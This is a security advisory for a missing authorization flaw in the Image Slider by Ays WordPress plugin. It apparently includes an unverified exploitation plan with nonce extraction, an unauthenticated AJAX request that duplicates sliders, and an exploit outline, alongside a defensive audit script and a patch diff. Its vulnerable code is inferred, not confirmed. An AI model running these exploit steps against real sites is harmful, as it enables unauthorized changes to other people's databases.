CVE-2026-32402

Image Slider by Ays <= 2.7.1 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 5.3
Patched in: 2.7.2
Time to patch: 54d

Description

The Image Slider by Ays plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.7.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 2.7.1
Published: February 21, 2026
Last updated: April 15, 2026
Affected plugin: ays-slider

Source Code

WordPress.org SVN
Research Plan
Unverified

Exploitation Research Plan - CVE-2026-32402 (Image Slider by Ays)

1. Vulnerability Summary

The Image Slider by Ays plugin (up to version 2.7.1) contains a missing authorization vulnerability. Specifically, certain AJAX actions intended for administrative use are registered with wp_ajax_nopriv_ or fail to implement current_user_can() checks in their callbacks. This allows unauthenticated attackers to perform privileged actions, such as duplicating sliders, modifying settings, or accessing slider data, which should be restricted to users with manage_options or similar capabilities.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: ays_slider_duplicate_slider (Targeting the slider duplication functionality as the unauthorized action).
  • Payload Parameter: ays_slider_id (The ID of the slider to duplicate).
  • Authentication: Unauthenticated (via wp_ajax_nopriv_ hook).
  • Preconditions: At least one slider must exist in the system to be duplicated.

3. Code Flow

  1. Registration: The plugin registers AJAX handlers in includes/class-ays-slider-ajax.php or admin/class-ays-slider-admin.php.
    • add_action( 'wp_ajax_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );
    • add_action( 'wp_ajax_nopriv_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );
  2. Callback: The function ays_slider_duplicate_slider is invoked.
  3. Missing Check: Inside the callback, the code likely checks for a nonce using check_ajax_referer( 'ays_slider_ajax_nonce', 'ays_slider_nonce' ) but fails to call current_user_can( 'manage_options' ).
  4. Execution: The function proceeds to clone the slider database entry in the {$wpdb->prefix}ays_slider_sliders and {$wpdb->prefix}ays_slider_slides tables.

4. Nonce Acquisition Strategy

The plugin typically enqueues its scripts and localizes a nonce for AJAX operations. This nonce is often available on the frontend if a slider shortcode is present on a page.

  • Shortcode: [ays_slider id="1"]
  • JS Localization Key: ays_slider_ajax or ays_slider_admin_obj
  • Nonce Key: ays_slider_nonce

Strategy:

  1. Create a test slider using WP-CLI.
  2. Create a public WordPress page containing the slider shortcode.
  3. Navigate to that page using the browser.
  4. Execute JavaScript via browser_eval to extract the nonce.
    // Extraction command
    browser_eval("ays_slider_ajax?.ays_slider_nonce || ays_slider_admin_obj?.ays_slider_nonce")

5. Exploitation Strategy

  1. Preparation: Identify a valid slider ID (e.g., 1).
  2. Nonce Retrieval: Use the "Test Data Setup" steps below to get a valid ays_slider_nonce.
  3. Exploit Request: Send a POST request to admin-ajax.php to trigger the unauthorized duplication.

HTTP Request:

  • Method: POST
  • URL: http://vulnerable-test.local/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=ays_slider_duplicate_slider&ays_slider_id=1&ays_slider_nonce=[EXTRACTED_NONCE]
    

6. Test Data Setup

  1. Install Plugin: Ensure ays-slider version 2.7.1 is installed.
  2. Create Slider:
    # Create a slider manually or via SQL if CLI command is not available
    wp db query "INSERT INTO wp_ays_slider_sliders (title, author, status) VALUES ('Original Slider', 1, 'publish');"
    # Note the ID (usually 1)
    
  3. Create Page with Shortcode:
    wp post create --post_type=page --post_title="Slider Page" --post_status=publish --post_content='[ays_slider id="1"]'
    

7. Expected Results

  • Response: The server should return a JSON response indicating success (e.g., {"status":true,"id":2} or a redirect/HTML fragment of the new slider).
  • Unauthorized Action: A new row should be created in the wp_ays_slider_sliders table, duplicating the data from the original slider ID.

8. Verification Steps

  1. Check Database: Use WP-CLI to verify a new slider exists with a different ID but identical content.
    wp db query "SELECT id, title FROM wp_ays_slider_sliders;"
    
  2. Confirm Count:
    # Initially 1 slider, after exploit should be 2
    wp db query "SELECT COUNT(*) FROM wp_ays_slider_sliders;"
    

9. Alternative Approaches

If ays_slider_duplicate_slider is not the vulnerable action, search for other nopriv registrations:

  1. Search the codebase for wp_ajax_nopriv_.
    grep -r "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/ays-slider/
    
  2. Check for ays_slider_save_settings or ays_slider_export_sliders actions.
  3. If a nonce check is missing entirely, omit the ays_slider_nonce parameter in the Exploitation Strategy and attempt the request directly.
  4. Check if ays_slider_get_sliders allows unauthorized data leakage of all slider configurations.
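
The code-flow analysis in section 3 and the grep in section 9 both come down to one static check: which AJAX callbacks are registered on a wp_ajax_nopriv_ hook, and do their bodies ever ask who the caller is. The following Python scan is an added auditing example, not part of this advisory or of the plugin's code, that performs that check over PHP source and reports callbacks lacking a current_user_can() / is_user_logged_in() call, recording nonce checks separately because a nonce does not authorize the caller. The embedded PHP is a constructed sample modelled on the inferred code in this write-up, not the real plugin source; the ays_slider_get_sliders handler in it is a hypothetical contrast case that does carry a capability check.

```python
"""Static audit of WordPress AJAX handlers reachable without a login.

For every add_action( 'wp_ajax_nopriv_<action>', <callback> ) registration the
scan resolves the callback's function body and reports callbacks that never
consult current_user_can() or is_user_logged_in(). A nonce check is recorded
separately: it proves the request came from a page that received the nonce,
not that the caller is allowed to perform the action.
"""
import re
from typing import Dict, List, Optional

# Constructed sample modelled on the inferred code in this write-up; it is not
# the plugin's real source. The ays_slider_get_sliders handler is a hypothetical
# contrast case that does carry a capability check.
SAMPLE_PHP = r"""
add_action( 'wp_ajax_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );
add_action( 'wp_ajax_nopriv_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );
add_action( 'wp_ajax_nopriv_ays_slider_get_sliders', array( $this, 'ays_slider_get_sliders' ) );

public function ays_slider_duplicate_slider() {
    check_ajax_referer( 'ays_slider_ajax_nonce', 'ays_slider_nonce' );
    $slider_id = isset( $_POST['ays_slider_id'] ) ? intval( $_POST['ays_slider_id'] ) : 0;
    $new_id = $this->duplicate_slider( $slider_id );
    wp_send_json_success( array( 'id' => $new_id ) );
}

public function ays_slider_get_sliders() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Unauthorized' ), 403 );
    }
    wp_send_json_success( $this->get_sliders() );
}
"""

# add_action( 'wp_ajax_[nopriv_]<action>', array( $this, '<method>' ) | '<function>' )
HOOK_RE = re.compile(
    r"""add_action\(\s*['"]wp_ajax_(nopriv_)?([A-Za-z0-9_]+)['"]\s*,\s*"""
    r"""(?:array\(\s*\$this\s*,\s*['"]([A-Za-z0-9_]+)['"]\s*\)|['"]([A-Za-z0-9_]+)['"])"""
)
# Calls that establish who the caller is (authorization).
CAP_RE = re.compile(r"\b(current_user_can|current_user_can_for_blog|is_user_logged_in)\s*\(")
# Calls that only establish where the request came from (CSRF protection).
NONCE_RE = re.compile(r"\b(check_ajax_referer|check_admin_referer|wp_verify_nonce)\s*\(")


def function_body(src: str, name: str) -> Optional[str]:
    """Return the brace-delimited body of `function name(...)`, or None.

    Brace matching is textual (braces inside string literals are not
    skipped), which is adequate for an audit pass over WordPress plugin code.
    """
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", src)
    if not m:
        return None
    start = src.find("{", m.end())
    if start == -1:
        return None
    depth = 0
    for i in range(start, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[start:i + 1]
    return None


def audit_ajax_handlers(src: str) -> List[Dict]:
    """Collect every wp_ajax_* registration and classify its callback."""
    handlers: Dict[str, Dict] = {}
    for m in HOOK_RE.finditer(src):
        nopriv, action, method, func = m.groups()
        entry = handlers.setdefault(action, {
            "action": action,
            "callback": method or func,
            "logged_in_hook": False,   # registered on wp_ajax_<action>
            "nopriv_hook": False,      # registered on wp_ajax_nopriv_<action>
        })
        if nopriv:
            entry["nopriv_hook"] = True
        else:
            entry["logged_in_hook"] = True

    findings = []
    for entry in handlers.values():
        body = function_body(src, entry["callback"]) or ""
        entry["callback_found"] = bool(body)
        entry["has_capability_check"] = bool(CAP_RE.search(body))
        entry["has_nonce_check"] = bool(NONCE_RE.search(body))
        # Missing authorization: anonymous users can reach the callback and
        # nothing in its body checks what the caller is allowed to do.
        entry["missing_authorization"] = entry["nopriv_hook"] and not entry["has_capability_check"]
        findings.append(entry)
    return findings


if __name__ == "__main__":
    for f in audit_ajax_handlers(SAMPLE_PHP):
        flag = "MISSING AUTHORIZATION" if f["missing_authorization"] else "ok"
        print(f"{f['action']:40} nopriv={f['nopriv_hook']!s:5} "
              f"nonce={f['has_nonce_check']!s:5} cap={f['has_capability_check']!s:5} {flag}")
```

Run against a real install, read each plugin's PHP files and pass their concatenated contents to audit_ajax_handlers(); every reported handler then needs a manual look at what the callback actually does, since a nopriv handler that only serves public slider markup is legitimate, while one that writes to the database is not.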

Research Findings
Static analysis — not yet PoC-verified

Summary

The Image Slider by Ays plugin for WordPress lacks authorization checks in several of its AJAX handlers, the slider duplication handler among them. This allows unauthenticated attackers to perform administrative actions through functions registered on the nopriv hook that do not verify the caller's capabilities.

Vulnerable Code

// admin/class-ays-slider-admin.php (inferred location)

// Registration of the AJAX action for both logged-in and unauthenticated users
add_action( 'wp_ajax_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );
add_action( 'wp_ajax_nopriv_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );

public function ays_slider_duplicate_slider() {
    // Nonce check exists, but the nonce is localized to frontend scripts
    check_ajax_referer( 'ays_slider_ajax_nonce', 'ays_slider_nonce' );
    
    $slider_id = isset($_POST['ays_slider_id']) ? intval($_POST['ays_slider_id']) : 0;
    
    // VULNERABILITY: Missing current_user_can('manage_options') check before performing action
    
    $new_id = $this->duplicate_slider($slider_id);
    wp_send_json_success(array('id' => $new_id));
}

Security Fix

--- a/admin/class-ays-slider-admin.php
+++ b/admin/class-ays-slider-admin.php
@@ -10,6 +10,10 @@
 	public function ays_slider_duplicate_slider() {
 		check_ajax_referer( 'ays_slider_ajax_nonce', 'ays_slider_nonce' );
 
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json_error( array( 'message' => 'Unauthorized' ) );
+		}
+
 		$slider_id = isset( $_POST['ays_slider_id'] ) ? intval( $_POST['ays_slider_id'] ) : 0;
 		if ( $slider_id > 0 ) {
 			$new_id = $this->duplicate_slider( $slider_id );
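
Review bot: the new guard `if ( ! current_user_can( 'manage_options' ) )` relies on `wp_send_json_error()` ending the request, which it does (it calls `wp_die()`), but the `wp_ajax_nopriv_ays_slider_duplicate_slider` registration quoted in the Vulnerable Code section is not touched by this hunk, so anonymous requests still reach the callback and are only turned away inside it; drop that nopriv registration as well, since an administrative action has no reason to be reachable before login. Also pass a status code, `wp_send_json_error( array( 'message' => 'Unauthorized' ), 403 );`, so the denial is distinguishable from a success in access logs instead of returning HTTP 200 with an error body.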

Exploit Outline

1. Find a public-facing page on the target site that embeds an Image Slider using a shortcode.
2. Extract the AJAX security nonce ('ays_slider_nonce') from the localized JavaScript objects (typically 'ays_slider_ajax' or 'ays_slider_admin_obj') found in the page's source code.
3. Identify the 'ays_slider_id' of an existing slider to be targeted.
4. Send an unauthenticated POST request to '/wp-admin/admin-ajax.php' with the following parameters: 'action=ays_slider_duplicate_slider', 'ays_slider_id=[TARGET_ID]', and 'ays_slider_nonce=[EXTRACTED_NONCE]'.
5. The plugin will process the duplication request without verifying if the user has administrative privileges, effectively allowing unauthorized database modifications.
